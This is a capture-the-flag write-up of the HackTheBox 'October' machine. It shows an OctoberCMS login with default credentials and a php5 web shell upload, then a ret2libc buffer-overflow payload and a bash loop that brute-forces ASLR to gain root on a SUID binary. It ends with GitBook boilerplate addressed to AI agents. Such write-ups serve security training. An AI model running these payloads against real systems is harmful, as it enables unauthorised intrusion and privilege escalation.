> For the complete documentation index, see [llms.txt](https://rouvin.gitbook.io/ibreakstuff/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/medium/october.md).

# October

## Gaining Access

Nmap scan:

<figure><img src="/files/oE4xFBs8bBtgJX1IXqFu" alt=""><figcaption></figcaption></figure>

We don't need to add anything into the hosts file.

### OctoberCMS

The website was running OctoberCMS and appears to have a default look:

<figure><img src="/files/dnttOfJrRjOtwDk7WVTM" alt=""><figcaption></figcaption></figure>

Registering an account and trying to do stuff with it was useless and had no functionalities. So instead, we can abuse the fact that OctoberCMS is an open-source project. A quick Google search reveals that the backend of this is at `/backend`:

{% embed url="<https://octobercms.com/forum/post/how-do-i-access-the-backend>" %}

<figure><img src="/files/uDd3lL2AJqhgsUbNsMNx" alt=""><figcaption></figcaption></figure>

We can use the default credentials of `admin:admin`.

<figure><img src="/files/FoDCbEZldg2YphhGnWZm" alt=""><figcaption></figcaption></figure>

OctoberCMS has quite a few exploits:

{% embed url="<https://www.exploit-db.com/exploits/41936>" %}

We can use one of them to upload a `cmd.php5` file to execute on the server, as `php5` is not blocked on the server:

<figure><img src="/files/vM3n6KVMvznBdpecV1k2" alt=""><figcaption></figcaption></figure>

We can confirm we have RCE via `curl`.

<figure><img src="/files/AnZiNX1uSsVDozqybd73" alt=""><figcaption></figcaption></figure>

Getting a reverse shell is then trivial.

## Privilege Escalation

### Ret2Libc

I ran a LinPEAS scan on the machine, and found this weird SUID binary called `overflw`:

<figure><img src="/files/UFYTmKnho34SEEs7PpO7" alt=""><figcaption></figcaption></figure>

I opened it up in Ghidra to view what it does:

<figure><img src="/files/RZ2pKyKa4WDQbUbtF3JP" alt=""><figcaption></figcaption></figure>

It appears we have a classic BOF expliot to do here. The `strcpy` function is vulnerable, and the buffer is pretty short. Doing a `checksec` reveals that NX is enabled but PIE is disabled:

```
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
```

In this case, we can go for a Ret2Libc attack. First, we find the buffer size:

<figure><img src="/files/JykLjI5fsnHObLEC4bZa" alt=""><figcaption></figcaption></figure>

Fixed at 112 it appears (same as length of `local_74`). Now, we can use `ldd` to find the address where `libc` is loaded on the machine:

<figure><img src="/files/qkmELsk9WH7a3E51xVzs" alt=""><figcaption></figcaption></figure>

Then we can simply execute the following commands to get the addresses we need

```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"
strings -a -t x /lib/i386-linux-gnu/libc-2.27.so | grep "/bin/sh"
```

Afterwards, we can use a python one-liner to print the contents of the payload:

{% code overflow="wrap" %}

```python
python2 -c 'print"\x90" * 112 + "\x10\x83\x62\xb7" + "\x60\xb2\x61\xb7" + "\xac\xab\x74\xb7"'
```

{% endcode %}

When run however, it didn't work on the machine. Turns out, the machine itself already had ASLR enabled, and this can be verified in `/proc/sys/kernel/randomize_va_space`. Also, when checking the addresses, it seems to randomly shift each time.

In this case, we can check the **range of addresses which ASLR spans**. In this case, the range of addreses looks rather small since `libc` is loaded at roughly the same location:

```
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc  
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75b1000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb763b000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7606000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7626000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7591000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7624000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7558000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7567000)
```

So, we can set up a `bash` script to keep looping until we get a successful exploit.

{% code overflow="wrap" %}

```bash
while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x83\x63\xb7" + "\x60\xb2\x62\xb7" + "\xac\xab\x75\xb7"'); done
```

{% endcode %}

<figure><img src="/files/80pPIcnbRSD0WfM5yPwL" alt=""><figcaption></figcaption></figure>

Rooted!


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/medium/october.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.